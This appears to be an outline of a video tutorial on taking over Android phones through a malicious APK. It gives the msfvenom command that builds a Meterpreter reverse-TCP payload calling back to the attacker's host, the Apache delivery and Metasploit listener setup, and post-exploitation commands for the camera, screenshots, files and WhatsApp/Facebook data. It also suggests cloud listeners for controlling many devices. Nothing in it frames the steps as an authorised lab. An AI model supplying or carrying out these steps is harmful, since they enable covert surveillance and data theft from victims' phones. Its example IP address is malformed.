Mobile Hacking with Malicious APK Files

Aug 11, 2024

How to Hack: Hacking Mobile Devices with Malicious APK Files

Overview

  • Host Meterpreter preview servers/listeners on the internet
  • Use a malicious APK file to hack into a mobile device
  • Gain complete control and access to the mobile device
  • Demonstration using Kali Linux and a mobile device

Preparation

Kali Linux Setup

  • Ensure Kali Linux is running
  • Mobile device connected via mobile data (not intranet)
  • Identify unique IP address for mobile device

Hosting Listener and Delivery Mechanism

  1. Identify Internal IP
    • Use ifconfig to find internal IP address (e.g., 192.168.1.23)
  2. Setup Browser for Router Configuration
    • Access router (e.g., 192.168.1.254)
    • Identify external IP address (e.g., 202.202.166.63.69)
  3. Port Forwarding Configuration
    • Host custom server (Kali Linux machine) on port 4444
    • Setup Apache web server to deliver APK file on port 8001
    • Commands to start Apache: service apache2 start
    • Verify Apache running: Check status and port
    • Apply port forwarding settings on the router

Creating Malicious APK File

  1. Using MSFVenom
    • Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<External IP> LPORT=4444 -o <path>/android_device.apk
    • Ensure correct LHOST (external IP) for internet access
  2. Deliver APK via Apache Web Server
    • Host APK file on Apache server

Setting Up Listener

  1. Metasploit Console
    • Command: msfconsole -q
    • Use multi-handler: use exploit/multi/handler
    • Set payload: set payload android/meterpreter/reverse_tcp
    • Show options: show options
    • Set LHOST and LPORT (internal IP and port 4444)
    • Start listener: exploit

Executing and Gaining Access

  1. On Android Device
    • Access APK file via browser: http://<External IP>:8001/android_device.apk
    • Download and install APK file
    • Grant permissions and open the app
  2. Post-Exploitation Commands
    • Gain information and control using commands:
      • sysinfo - Device information
      • app_run, app_install - Manage applications
      • webcam_list, webcam_chat, screenshot - Access camera
      • pwd, ls, cd - Navigate filesystem
    • Access sensitive data (e.g., Facebook, WhatsApp directories)

Additional Notes

  • Same method can be applied to other devices (e.g., laptops, tablets)
  • Future scenarios involve hosting listeners on cloud providers for scalable operations
  • Manage numerous devices seamlessly

Conclusion

  • Importance of understanding cyber security techniques
  • Call to action: Like, subscribe, and leave comments for further engagement

Thank you for watching!